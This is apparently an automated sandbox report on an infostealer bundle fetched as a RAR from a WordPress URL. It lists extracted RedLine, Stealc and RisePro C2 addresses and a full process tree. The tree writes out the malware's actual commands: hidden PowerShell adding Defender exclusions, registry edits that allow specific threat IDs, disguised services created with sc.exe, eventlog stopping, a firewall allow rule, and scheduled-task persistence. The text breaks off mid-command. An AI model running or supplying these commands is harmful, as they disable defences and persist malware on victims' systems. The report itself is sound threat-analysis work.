Analysis

  • max time kernel
    168s
  • max time network
    439s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240709-en
  • resource tags

    arch:x64arch:x86image:win11-20240709-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    19-07-2024 19:00

General

Malware Config

Extracted

Family

redline

Botnet

LogsDiller Cloud (TG: @logsdillabot)

C2

77.105.135.107:3445

Extracted

Family

stealc

Botnet

default

C2

http://85.28.47.31

Attributes
  • url_path

    /5499d72b3a3e55be.php

Extracted

Family

risepro

C2

194.110.13.70

77.105.133.27

Signatures

  • Modifies firewall policy service 3 TTPs 1 IoCs
  • PrivateLoader

    PrivateLoader is a downloader sold as a pay-per-install malware distribution service.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 1 IoCs
  • RisePro

    RisePro stealer is an infostealer distributed by PrivateLoader.

  • Stealc

    Stealc is an infostealer written in C++.

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Run Powershell and hide display window.

  • Creates new service(s) 2 TTPs
  • Downloads MZ/PE file
  • Modifies Windows Firewall 2 TTPs 1 IoCs
  • Stops running service(s) 4 TTPs
  • Checks BIOS information in registry 2 TTPs 3 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Drops startup file 1 IoCs
  • Executes dropped EXE 17 IoCs
  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 3 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Unexpected DNS network traffic destination 1 IoCs

    Network traffic to other servers than the configured DNS servers was detected on the DNS port.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 4 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Power Settings 1 TTPs 8 IoCs

    powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Drops file in System32 directory 4 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Drops file in Windows directory 1 IoCs
  • Launches sc.exe 7 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 9 IoCs
  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
  • Enumerates system info in registry 2 TTPs 5 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 1 IoCs
  • NTFS ADS 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 12 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 19 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://conducaqueta.com/wp-includes/driect/district7845k3.rar
    1⤵
    • Drops file in Windows directory
    • Enumerates system info in registry
    • Modifies data under HKEY_USERS
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:1624
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.106 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe5e6fcc40,0x7ffe5e6fcc4c,0x7ffe5e6fcc58
      2⤵
        PID:1676
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1820,i,14181902742403423825,15337050471854034169,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=1816 /prefetch:2
        2⤵
          PID:4924
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1940,i,14181902742403423825,15337050471854034169,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=2108 /prefetch:3
          2⤵
            PID:4588
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2132,i,14181902742403423825,15337050471854034169,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=2368 /prefetch:8
            2⤵
              PID:2092
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3048,i,14181902742403423825,15337050471854034169,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=3080 /prefetch:1
              2⤵
                PID:844
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3064,i,14181902742403423825,15337050471854034169,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=3260 /prefetch:1
                2⤵
                  PID:3508
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4812,i,14181902742403423825,15337050471854034169,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=4832 /prefetch:8
                  2⤵
                    PID:3432
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4448,i,14181902742403423825,15337050471854034169,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=4504 /prefetch:8
                    2⤵
                    • NTFS ADS
                    PID:4396
                • C:\Program Files\Google\Chrome\Application\123.0.6312.106\elevation_service.exe
                  "C:\Program Files\Google\Chrome\Application\123.0.6312.106\elevation_service.exe"
                  1⤵
                    PID:2320
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
                    1⤵
                      PID:2768
                    • C:\Windows\System32\rundll32.exe
                      C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                      1⤵
                        PID:5020
                      • C:\Program Files\7-Zip\7zFM.exe
                        "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\district7845k3.rar"
                        1⤵
                        • Suspicious behavior: GetForegroundWindowSpam
                        PID:580
                      • C:\Windows\system32\taskmgr.exe
                        "C:\Windows\system32\taskmgr.exe"
                        1⤵
                        • Checks SCSI registry key(s)
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of SendNotifyMessage
                        PID:1268
                        • C:\Windows\system32\taskmgr.exe
                          "C:\Windows\system32\taskmgr.exe" /1
                          2⤵
                          • Checks SCSI registry key(s)
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious behavior: GetForegroundWindowSpam
                          • Suspicious use of SendNotifyMessage
                          PID:1572
                      • C:\Users\Admin\Desktop\a\setup.exe
                        "C:\Users\Admin\Desktop\a\setup.exe"
                        1⤵
                        • Modifies firewall policy service
                        • Executes dropped EXE
                        • Drops file in System32 directory
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of SetWindowsHookEx
                        PID:2524
                        • C:\Users\Admin\Documents\SimpleAdobe\38QvdYNi5VKzUjtsmoG9LlW9.exe
                          C:\Users\Admin\Documents\SimpleAdobe\38QvdYNi5VKzUjtsmoG9LlW9.exe
                          2⤵
                          • Executes dropped EXE
                          PID:2736
                          • C:\Windows\system32\powercfg.exe
                            C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                            3⤵
                            • Power Settings
                            PID:2084
                          • C:\Windows\system32\powercfg.exe
                            C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                            3⤵
                            • Power Settings
                            PID:4660
                          • C:\Windows\system32\powercfg.exe
                            C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                            3⤵
                            • Power Settings
                            PID:3644
                          • C:\Windows\system32\powercfg.exe
                            C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                            3⤵
                            • Power Settings
                            PID:1904
                          • C:\Windows\system32\sc.exe
                            C:\Windows\system32\sc.exe delete "CIFUBVHI"
                            3⤵
                            • Launches sc.exe
                            PID:4500
                          • C:\Windows\system32\sc.exe
                            C:\Windows\system32\sc.exe create "CIFUBVHI" binpath= "C:\ProgramData\lmguvcpihozg\eqtpkqwqodik.exe" start= "auto"
                            3⤵
                            • Launches sc.exe
                            PID:3152
                          • C:\Windows\system32\sc.exe
                            C:\Windows\system32\sc.exe stop eventlog
                            3⤵
                            • Launches sc.exe
                            PID:3352
                          • C:\Windows\system32\sc.exe
                            C:\Windows\system32\sc.exe start "CIFUBVHI"
                            3⤵
                            • Launches sc.exe
                            PID:1088
                        • C:\Users\Admin\Documents\SimpleAdobe\r99j1zbGXuE0Rgh4_PSS6LgU.exe
                          C:\Users\Admin\Documents\SimpleAdobe\r99j1zbGXuE0Rgh4_PSS6LgU.exe
                          2⤵
                          • Executes dropped EXE
                          • Suspicious use of SetThreadContext
                          PID:2992
                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                            3⤵
                              PID:436
                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                              3⤵
                              • Suspicious use of SetWindowsHookEx
                              PID:2560
                              • C:\ProgramData\IEBFHCAKFB.exe
                                "C:\ProgramData\IEBFHCAKFB.exe"
                                4⤵
                                  PID:2832
                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                    5⤵
                                      PID:4880
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4880 -s 1084
                                        6⤵
                                        • Program crash
                                        PID:4244
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4880 -s 1100
                                        6⤵
                                        • Program crash
                                        PID:5080
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4880 -s 1084
                                        6⤵
                                        • Program crash
                                        PID:3048
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4880 -s 1116
                                        6⤵
                                        • Program crash
                                        PID:1764
                                  • C:\ProgramData\ECFHIJKJKF.exe
                                    "C:\ProgramData\ECFHIJKJKF.exe"
                                    4⤵
                                      PID:1088
                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                        5⤵
                                          PID:4044
                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                          5⤵
                                            PID:2516
                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                            5⤵
                                              PID:4488
                                          • C:\Windows\SysWOW64\cmd.exe
                                            "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\KJJJKFIIIJJJ" & exit
                                            4⤵
                                              PID:1464
                                              • C:\Windows\SysWOW64\timeout.exe
                                                timeout /t 10
                                                5⤵
                                                • Delays execution with timeout.exe
                                                PID:1616
                                        • C:\Users\Admin\Documents\SimpleAdobe\z1ZQQNKJNNbY8QZLH7lbLgYD.exe
                                          C:\Users\Admin\Documents\SimpleAdobe\z1ZQQNKJNNbY8QZLH7lbLgYD.exe
                                          2⤵
                                          • Executes dropped EXE
                                          • Suspicious use of SetThreadContext
                                          • Suspicious use of SetWindowsHookEx
                                          PID:3448
                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                            3⤵
                                              PID:4488
                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                              3⤵
                                                PID:2420
                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                3⤵
                                                  PID:4040
                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                  3⤵
                                                  • Suspicious use of SetWindowsHookEx
                                                  PID:2492
                                              • C:\Users\Admin\Documents\SimpleAdobe\IMoKYPFKgn1syQluedN20JJu.exe
                                                C:\Users\Admin\Documents\SimpleAdobe\IMoKYPFKgn1syQluedN20JJu.exe
                                                2⤵
                                                • Executes dropped EXE
                                                • Suspicious use of SetWindowsHookEx
                                                PID:1736
                                                • C:\Users\Admin\AppData\Local\Temp\7zS4901.tmp\Install.exe
                                                  .\Install.exe
                                                  3⤵
                                                  • Executes dropped EXE
                                                  • Suspicious use of SetWindowsHookEx
                                                  PID:3664
                                                  • C:\Users\Admin\AppData\Local\Temp\7zS58B0.tmp\Install.exe
                                                    .\Install.exe /SYdidWVuIE "385132" /S
                                                    4⤵
                                                    • Checks BIOS information in registry
                                                    • Executes dropped EXE
                                                    • Enumerates system info in registry
                                                    • Suspicious use of SetWindowsHookEx
                                                    PID:2920
                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                      "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                                                      5⤵
                                                        PID:2448
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                          6⤵
                                                            PID:1088
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                              7⤵
                                                              • Command and Scripting Interpreter: PowerShell
                                                              PID:3636
                                                              • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                8⤵
                                                                  PID:652
                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                            schtasks /CREATE /TN "bTVQzzKDZQMhkLPDbz" /SC once /ST 19:07:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS58B0.tmp\Install.exe\" hU /oRdidef 385132 /S" /V1 /F
                                                            5⤵
                                                            • Scheduled Task/Job: Scheduled Task
                                                            PID:404
                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2920 -s 828
                                                            5⤵
                                                            • Program crash
                                                            PID:1544
                                                    • C:\Users\Admin\Documents\SimpleAdobe\nWdjxDTbCN5FMEEkKSfskTLE.exe
                                                      C:\Users\Admin\Documents\SimpleAdobe\nWdjxDTbCN5FMEEkKSfskTLE.exe
                                                      2⤵
                                                      • Executes dropped EXE
                                                      • Suspicious use of SetWindowsHookEx
                                                      PID:2624
                                                      • C:\Users\Admin\AppData\Local\Temp\is-HT5LA.tmp\nWdjxDTbCN5FMEEkKSfskTLE.tmp
                                                        "C:\Users\Admin\AppData\Local\Temp\is-HT5LA.tmp\nWdjxDTbCN5FMEEkKSfskTLE.tmp" /SL5="$40214,4974980,54272,C:\Users\Admin\Documents\SimpleAdobe\nWdjxDTbCN5FMEEkKSfskTLE.exe"
                                                        3⤵
                                                        • Executes dropped EXE
                                                        • Loads dropped DLL
                                                        • Suspicious use of SetWindowsHookEx
                                                        PID:4256
                                                        • C:\Users\Admin\AppData\Local\Audio Output Switcher\audiooutputswitcher32_64.exe
                                                          "C:\Users\Admin\AppData\Local\Audio Output Switcher\audiooutputswitcher32_64.exe" -i
                                                          4⤵
                                                          • Executes dropped EXE
                                                          • Suspicious use of SetWindowsHookEx
                                                          PID:2068
                                                        • C:\Users\Admin\AppData\Local\Audio Output Switcher\audiooutputswitcher32_64.exe
                                                          "C:\Users\Admin\AppData\Local\Audio Output Switcher\audiooutputswitcher32_64.exe" -s
                                                          4⤵
                                                          • Executes dropped EXE
                                                          • Suspicious use of SetWindowsHookEx
                                                          PID:2336
                                                    • C:\Users\Admin\Documents\SimpleAdobe\1X84PSuuA0y0QaAPi0a8BtoT.exe
                                                      C:\Users\Admin\Documents\SimpleAdobe\1X84PSuuA0y0QaAPi0a8BtoT.exe
                                                      2⤵
                                                      • Executes dropped EXE
                                                      • Suspicious use of SetWindowsHookEx
                                                      PID:2876
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\kborhccd\
                                                        3⤵
                                                          PID:4664
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\qxehwkdn.exe" C:\Windows\SysWOW64\kborhccd\
                                                          3⤵
                                                            PID:1576
                                                          • C:\Windows\SysWOW64\sc.exe
                                                            "C:\Windows\System32\sc.exe" create kborhccd binPath= "C:\Windows\SysWOW64\kborhccd\qxehwkdn.exe /d\"C:\Users\Admin\Documents\SimpleAdobe\1X84PSuuA0y0QaAPi0a8BtoT.exe\"" type= own start= auto DisplayName= "wifi support"
                                                            3⤵
                                                            • Launches sc.exe
                                                            PID:4324
                                                          • C:\Windows\SysWOW64\sc.exe
                                                            "C:\Windows\System32\sc.exe" description kborhccd "wifi internet conection"
                                                            3⤵
                                                            • Launches sc.exe
                                                            PID:2136
                                                          • C:\Windows\SysWOW64\sc.exe
                                                            "C:\Windows\System32\sc.exe" start kborhccd
                                                            3⤵
                                                            • Launches sc.exe
                                                            PID:4932
                                                          • C:\Windows\SysWOW64\netsh.exe
                                                            "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                                            3⤵
                                                            • Modifies Windows Firewall
                                                            PID:1112
                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2876 -s 844
                                                            3⤵
                                                            • Program crash
                                                            PID:3052
                                                        • C:\Users\Admin\Documents\SimpleAdobe\aUsVW6eQgvmDedjfdg6pBNYa.exe
                                                          C:\Users\Admin\Documents\SimpleAdobe\aUsVW6eQgvmDedjfdg6pBNYa.exe
                                                          2⤵
                                                          • Executes dropped EXE
                                                          • Writes to the Master Boot Record (MBR)
                                                          • Suspicious use of SetWindowsHookEx
                                                          PID:2028
                                                        • C:\Users\Admin\Documents\SimpleAdobe\yd4DERbCDGWTwq59gQX94420.exe
                                                          C:\Users\Admin\Documents\SimpleAdobe\yd4DERbCDGWTwq59gQX94420.exe
                                                          2⤵
                                                          • Executes dropped EXE
                                                          • Suspicious use of SetThreadContext
                                                          PID:4592
                                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                            3⤵
                                                            • Suspicious use of SetWindowsHookEx
                                                            PID:32
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\HDBGDHDAECBG" & exit
                                                              4⤵
                                                                PID:4176
                                                                • C:\Windows\SysWOW64\timeout.exe
                                                                  timeout /t 10
                                                                  5⤵
                                                                  • Delays execution with timeout.exe
                                                                  PID:4976
                                                          • C:\Users\Admin\Documents\SimpleAdobe\4y1HNAvbvDy4j5ge1NnXrzpF.exe
                                                            C:\Users\Admin\Documents\SimpleAdobe\4y1HNAvbvDy4j5ge1NnXrzpF.exe
                                                            2⤵
                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                            • Checks BIOS information in registry
                                                            • Drops startup file
                                                            • Executes dropped EXE
                                                            • Adds Run key to start application
                                                            • Checks whether UAC is enabled
                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                            • Suspicious use of SetWindowsHookEx
                                                            PID:1552
                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                              schtasks /create /f /RU "Admin" /tr "C:\ProgramData\WinTrackerSP\WinTrackerSP.exe" /tn "WinTrackerSP HR" /sc HOURLY /rl HIGHEST
                                                              3⤵
                                                              • Scheduled Task/Job: Scheduled Task
                                                              PID:2124
                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                              schtasks /create /f /RU "Admin" /tr "C:\ProgramData\WinTrackerSP\WinTrackerSP.exe" /tn "WinTrackerSP LG" /sc ONLOGON /rl HIGHEST
                                                              3⤵
                                                              • Scheduled Task/Job: Scheduled Task
                                                              PID:1636
                                                          • C:\Users\Admin\Documents\SimpleAdobe\bQLB3FlZKYQi7tYDtfDZjwzi.exe
                                                            C:\Users\Admin\Documents\SimpleAdobe\bQLB3FlZKYQi7tYDtfDZjwzi.exe
                                                            2⤵
                                                            • Executes dropped EXE
                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                            • Suspicious use of SetWindowsHookEx
                                                            PID:1960
                                                          • C:\Users\Admin\Documents\SimpleAdobe\dVGIT9Tw2szYUM_tcnOl4Mkp.exe
                                                            C:\Users\Admin\Documents\SimpleAdobe\dVGIT9Tw2szYUM_tcnOl4Mkp.exe
                                                            2⤵
                                                            • Executes dropped EXE
                                                            • Suspicious use of SetThreadContext
                                                            • Suspicious use of SetWindowsHookEx
                                                            PID:1856
                                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                              3⤵
                                                              • Suspicious use of SetWindowsHookEx
                                                              PID:3668
                                                        • C:\Windows\system32\svchost.exe
                                                          C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                                          1⤵
                                                            PID:4880
                                                          • C:\Windows\system32\svchost.exe
                                                            C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                            1⤵
                                                              PID:1620
                                                            • C:\Windows\SysWOW64\kborhccd\qxehwkdn.exe
                                                              C:\Windows\SysWOW64\kborhccd\qxehwkdn.exe /d"C:\Users\Admin\Documents\SimpleAdobe\1X84PSuuA0y0QaAPi0a8BtoT.exe"
                                                              1⤵
                                                                PID:2084
                                                                • C:\Windows\SysWOW64\svchost.exe
                                                                  svchost.exe
                                                                  2⤵
                                                                    PID:1948
                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 2084 -s 588
                                                                    2⤵
                                                                    • Program crash
                                                                    PID:3776
                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 2876 -ip 2876
                                                                  1⤵
                                                                    PID:4600
                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 2084 -ip 2084
                                                                    1⤵
                                                                      PID:3360
                                                                    • C:\ProgramData\lmguvcpihozg\eqtpkqwqodik.exe
                                                                      C:\ProgramData\lmguvcpihozg\eqtpkqwqodik.exe
                                                                      1⤵
                                                                        PID:4976
                                                                        • C:\Windows\system32\powercfg.exe
                                                                          C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                          2⤵
                                                                          • Power Settings
                                                                          PID:4132
                                                                        • C:\Windows\system32\powercfg.exe
                                                                          C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                          2⤵
                                                                          • Power Settings
                                                                          PID:2224
                                                                        • C:\Windows\system32\powercfg.exe
                                                                          C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                          2⤵
                                                                          • Power Settings
                                                                          PID:1516
                                                                        • C:\Windows\system32\powercfg.exe
                                                                          C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                          2⤵
                                                                          • Power Settings
                                                                          PID:4668
                                                                        • C:\Windows\system32\conhost.exe
                                                                          C:\Windows\system32\conhost.exe
                                                                          2⤵
                                                                            PID:2476
                                                                          • C:\Windows\system32\svchost.exe
                                                                            svchost.exe
                                                                            2⤵
                                                                              PID:3436
                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS58B0.tmp\Install.exe
                                                                            C:\Users\Admin\AppData\Local\Temp\7zS58B0.tmp\Install.exe hU /oRdidef 385132 /S
                                                                            1⤵
                                                                              PID:228
                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows 